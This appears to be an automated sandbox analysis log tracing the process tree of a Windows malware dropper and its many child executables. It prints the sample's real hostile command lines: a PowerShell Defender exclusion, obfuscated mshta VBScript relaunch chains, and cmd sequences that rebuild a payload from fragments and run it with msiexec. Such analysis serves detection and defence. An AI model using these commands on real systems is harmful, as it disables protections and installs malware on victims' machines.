PID 2892 wrote to memory of 2552	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3776	2892	setup_install.exe	chrome.exe
PID 2892 wrote to memory of 3776	2892	setup_install.exe	chrome.exe
PID 2892 wrote to memory of 3776	2892	setup_install.exe	chrome.exe
PID 2892 wrote to memory of 4916	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4916	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4916	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3044	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3044	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3044	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3512	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3512	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3512	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4592	2892	setup_install.exe	Conhost.exe
PID 2892 wrote to memory of 4592	2892	setup_install.exe	Conhost.exe
PID 2892 wrote to memory of 4592	2892	setup_install.exe	Conhost.exe
PID 2892 wrote to memory of 2740	2892	setup_install.exe	Conhost.exe
PID 2892 wrote to memory of 2740	2892	setup_install.exe	Conhost.exe
PID 2892 wrote to memory of 2740	2892	setup_install.exe	Conhost.exe
PID 2892 wrote to memory of 1688	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1688	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1688	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3376	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3376	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3376	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3172	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3172	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3172	2892	setup_install.exe	cmd.exe
PID 4916 wrote to memory of 3224	4916	cmd.exe	Mon201629b9d021e.exe
PID 4916 wrote to memory of 3224	4916	cmd.exe	Mon201629b9d021e.exe
PID 1464 wrote to memory of 2660	1464	cmd.exe	Conhost.exe
PID 1464 wrote to memory of 2660	1464	cmd.exe	Conhost.exe
PID 1464 wrote to memory of 2660	1464	cmd.exe	Conhost.exe
PID 3512 wrote to memory of 3900	3512	cmd.exe	mshta.exe
PID 3512 wrote to memory of 3900	3512	cmd.exe	mshta.exe

C:\Users\Admin\AppData\Local\Temp\1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
"C:\Users\Admin\AppData\Local\Temp\1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4840
- C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon201cb4c63ce4.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1464
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon201cb4c63ce4.exe
      Mon201cb4c63ce4.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2660
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCript:ClOsE ( cREateObjEct ( "WSCRiPt.SheLl").rUN( "C:\Windows\system32\cmd.exe /Q /R CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon201cb4c63ce4.exe"" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If """" == """" for %u In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon201cb4c63ce4.exe"") do taskkill -f /iM ""%~nXu"" " ,0 , truE ) )
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3400
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q /R CoPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon201cb4c63ce4.exe" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If "" == "" for %u In ( "C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon201cb4c63ce4.exe") do taskkill -f /iM "%~nXu"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\O5lIe.exE
        
        O5lie.exe /p0vFkT3Hyul
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3040
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCript:ClOsE ( cREateObjEct ( "WSCRiPt.SheLl").rUN( "C:\Windows\system32\cmd.exe /Q /R CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\O5lIe.exE"" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If ""/p0vFkT3Hyul "" == """" for %u In ( ""C:\Users\Admin\AppData\Local\Temp\O5lIe.exE"") do taskkill -f /iM ""%~nXu"" " ,0 , truE ) )
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1600
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q /R CoPY /Y "C:\Users\Admin\AppData\Local\Temp\O5lIe.exE" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If "/p0vFkT3Hyul " == "" for %u In ( "C:\Users\Admin\AppData\Local\Temp\O5lIe.exE") do taskkill -f /iM "%~nXu"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2740
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScRIPt: CLosE (CREAtEObJect ("wSCRipT.sHEll").RUN ( "cMd /C EcHo | set /P = ""MZ"" > 83~QW.MQM&copY /b /y 83~QW.MQM + K11w8L.CJH+GwZ9.K3 +XQkW.Nw6 nrRWTYRS.P & StArt msiexec -Y .\nRRWTYRS.p & DEL K11w8L.CJH GwZ9.K3 XQKW.Nw6 83~QW.MQm " , 0, trUE ))
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EcHo | set /P = "MZ" > 83~QW.MQM&copY /b /y 83~QW.MQM +K11w8L.CJH+GwZ9.K3 +XQkW.Nw6 nrRWTYRS.P & StArt msiexec -Y .\nRRWTYRS.p & DEL K11w8L.CJH GwZ9.K3 XQKW.Nw6 83~QW.MQm
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>83~QW.MQM"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4884
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y .\nRRWTYRS.p
        10⤵
        Loads dropped DLL
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:3864
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f /iM "Mon201cb4c63ce4.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2024c1cb997.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3828
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon2024c1cb997.exe
      Mon2024c1cb997.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon20c36d61c41847b17.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4176
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon20c36d61c41847b17.exe
      Mon20c36d61c41847b17.exe
      4⤵
      Executes dropped EXE
      Drops Chrome extension
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3468
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2300
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2660
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1340
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        5⤵
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2928
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffdd2accc40,0x7ffdd2accc4c,0x7ffdd2accc58
        6⤵
        
        PID:4700
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1932 /prefetch:2
        6⤵
        
        PID:760
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2200 /prefetch:3
        6⤵
        
        PID:2604
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8
        6⤵
        
        PID:3776
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1
        6⤵
        
        PID:2968
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3280 /prefetch:1
        6⤵
        
        PID:2020
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4556,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4516 /prefetch:1
        6⤵
        
        PID:2320
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
        6⤵
        
        PID:1992
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4376,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4808 /prefetch:8
        6⤵
        
        PID:1872
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:8
        6⤵
        
        PID:1984
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4924,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4704 /prefetch:8
        6⤵
        
        PID:5060
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5092,i,17795554962151077959,17247256018520699778,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4564 /prefetch:8
        6⤵
        
        PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon203223fed8a4266c.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4088
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon203223fed8a4266c.exe
      Mon203223fed8a4266c.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2092b01a62c73.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon2092b01a62c73.exe
      Mon2092b01a62c73.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4656
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1632
        5⤵
        Program crash
        
        PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon20b3dfc29da.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon20b3dfc29da.exe
      Mon20b3dfc29da.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon206e4c938239.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2552
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon206e4c938239.exe
      Mon206e4c938239.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4012
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon206e4c938239.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon206e4c938239.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon200cb51003361.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3776
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon200cb51003361.exe
      Mon200cb51003361.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4612
    - - C:\Users\Admin\AppData\Local\Temp\is-82V15.tmp\Mon200cb51003361.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-82V15.tmp\Mon200cb51003361.tmp" /SL5="$60280,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon200cb51003361.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1608
      - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon200cb51003361.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon200cb51003361.exe" /SILENT
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\is-6NH1D.tmp\Mon200cb51003361.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6NH1D.tmp\Mon200cb51003361.tmp" /SL5="$8028E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon200cb51003361.exe" /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon201629b9d021e.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon201629b9d021e.exe
      Mon201629b9d021e.exe
      4⤵
      Executes dropped EXE
      PID:3224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2009d34d832dfd1d9.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3044
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon2009d34d832dfd1d9.exe
      Mon2009d34d832dfd1d9.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon200820e9da.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3512
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon200820e9da.exe
      Mon200820e9da.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      PID:3900
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 360
        5⤵
        Program crash
        
        PID:3060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon20b09e42933548639.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4592
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon20b09e42933548639.exe
      Mon20b09e42933548639.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2604
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon20b09e42933548639.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon20b09e42933548639.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3688
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon20b09e42933548639.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon20b09e42933548639.exe" ) do taskkill -f -iM "%~NxM"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3788
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3900
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1596
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2020
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4640
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\e58f642.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e58f642.exe"
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2384
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 780
        12⤵
        Program crash
        
        PID:3152
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "Mon20b09e42933548639.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon209df24d5e8f7.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2740
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon209df24d5e8f7.exe
      Mon209df24d5e8f7.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1444
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon209df24d5e8f7.exe
        
        Mon209df24d5e8f7.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2050daa466f6f.exe /mixone
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1688
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon2050daa466f6f.exe
      Mon2050daa466f6f.exe /mixone
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1468
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 624
        5⤵
        Program crash
        
        PID:4840
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 660
        5⤵
        Program crash
        
        PID:388
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 748
        5⤵
        Program crash
        
        PID:1996
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 768
        5⤵
        Program crash
        
        PID:4532
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 664
        5⤵
        Program crash
        
        PID:448
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 812
        5⤵
        Program crash
        
        PID:808
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 800
        5⤵
        Program crash
        
        PID:4556
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 632
        5⤵
        Program crash
        
        PID:2340
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 1088
